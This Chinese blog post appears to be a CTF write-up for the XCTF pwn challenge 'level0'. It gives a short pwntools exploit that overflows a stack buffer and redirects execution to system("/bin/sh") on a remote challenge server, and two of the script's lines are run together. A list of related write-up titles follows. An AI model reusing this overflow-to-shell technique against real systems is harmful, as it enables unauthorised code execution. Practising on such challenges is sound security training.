[攻防世界 pwn]——level0

  • 题目地址: https://adworld.xctf.org.cn/
  • 题目:

    checksec看下保护类型,开启了NX保护

    IDA中看下,发现了system("/bin/sh")函数,返回地址修改为该函数就可以



exploit

from pwn import *
#p = process("./pwn")
p = remote("111.200.241.244",40322)
sys_addr = 0x0400596payload = 'a'*(0x80+8) + p64(sys_addr)
p.sendline(payload)
p.interactive()

[攻防世界 pwn]——level0相关推荐

  1. 【pwn】攻防世界 pwn新手区wp

    [pwn]攻防世界 pwn新手区wp 前言 这几天恶补pwn的各种知识点,然后看了看攻防世界的pwn新手区没有堆题(堆才刚刚开始看),所以就花了一晚上的时间把新手区的10题给写完了. 1.get_sh ...

  2. 攻防世界(Pwn) forgot---栈溢出;(方法二)

    攻防世界(Pwn) forgot-栈溢出:(方法一) 里面对问题描述的更详细一点 返回目标函数 0x80486CC 方法二(爆破流) 因为最终返回的是 v3[0]-v3[9] 之中的一个函数, v3[ ...

  3. 攻防世界(Pwn) forgot---栈溢出;(方法一)

    攻防世界(Pwn) forgot-栈溢出:(方法二) 介绍 这道题表面看起来有点复杂,其实很简单,有两种方法可以来做这一道题; 方法一(精确打击) 文件运行流程是: 1.先输入名字 2. 输入一串字符 ...

  4. [攻防世界 pwn]——pwn1(内涵peak小知识)

    [攻防世界 pwn]--pwn1 题目地址:https://adworld.xctf.org.cn/ 题目: peak小知识 这道题目的关键就是泄露canary,通常我们泄露canary有两种方法,遇 ...

  5. [攻防世界 pwn]——实时数据监测

    [攻防世界 pwn]--实时数据监测 题目地址:https://adworld.xctf.org.cn/ 题目: checksec就不说了,没什么 ida中 只要将key里面的值修改为35795746 ...

  6. [攻防世界 pwn]——monkey

    [攻防世界 pwn]--monkey 题目地址:https://adworld.xctf.org.cn/ 题目: 额,怎么说呢这道题.checksec没什么大不了的 但是再IDA中就懵了,好大呀.好多 ...

  7. [攻防世界 pwn]——反应釜开关控制

    [攻防世界 pwn]--反应釜开关控制 题目地址:https://adworld.xctf.org.cn/ 题目: 无言以对,直接给你shell函数,返回覆盖到shell函数就OK了 exploit ...

  8. [攻防世界 pwn]——pwn-100

    [攻防世界 pwn]--pwn-100 题目地址: https://adworld.xctf.org.cn/ 题目: checksec一下 IDA中 sub_40063D函数的作用就是读入200个字符 ...

  9. [攻防世界 pwn]——pwn-200

    [攻防世界 pwn]--pwn-200 题目地址: https://adworld.xctf.org.cn/ 题目: peak小知识 ret2libc的题型, 一般给一个输出和一个输入的函数, 输入一 ...

最新文章

  1. Excel万年历的制作
  2. CSP认证201409-2 画图[C++题解]:模拟、图形的并
  3. 小米手机能用上鸿蒙吗,鸿蒙系统小米手机能用吗?鸿蒙系统支持第三方手机!
  4. 常见的多变查询,和遇到的一些坑。。。。
  5. Serverless实战 —— 使用 Wintersmith + Serverless Framework 快速创建个人站点
  6. keepalived安装实录
  7. 女式T恤行业调研报告 - 市场现状分析与发展前景预测
  8. 印度软件水平和中国的程序员
  9. IntelliJ Cannot find declaration to goto----解决方案
  10. bootstrap拖动div_BootStrap modal实现拖拽功能
  11. *循环单链表[不带头结点]
  12. c语言入门-程序运行的过程
  13. 20200903-03-Hadoop运行模式之本地运行模式伪分布式运行模式
  14. 基于Nginx实现访问控制,连接限制离
  15. 我们一起学爪哇(2)
  16. tyvj P2018 「Nescafé26」小猫爬山 解题报告
  17. HtmlUnit入门教程
  18. 实验A---- ADFA的可判定性
  19. CSS3新增属性汇总
  20. java经典小算法----小球从100米高度自由落下;

热门文章

  1. Myeclipse10下载,安装,破解,插件,优化介绍.
  2. c++实现高精度乘法!
  3. 用Unity3D实现智能巡逻兵游戏
  4. [python学习] 简单爬取图片网站图库中图片
  5. C# 系统应用之注册表使用详解
  6. Git之常见零碎问题的原因分析和解决方案
  7. 【数据结构与算法】之深入解析“删除二叉搜索树中的节点”的求解思路与算法示例
  8. 马斯克认为 AI 必超越并威胁人类,他宁愿搞脑机接口也不碰AI
  9. 信息学奥赛一本通(C++)在线评测系统——基础(一)C++语言——1107:校门外的树
  10. [Qt教程] 第45篇 进阶(五)Qt样式表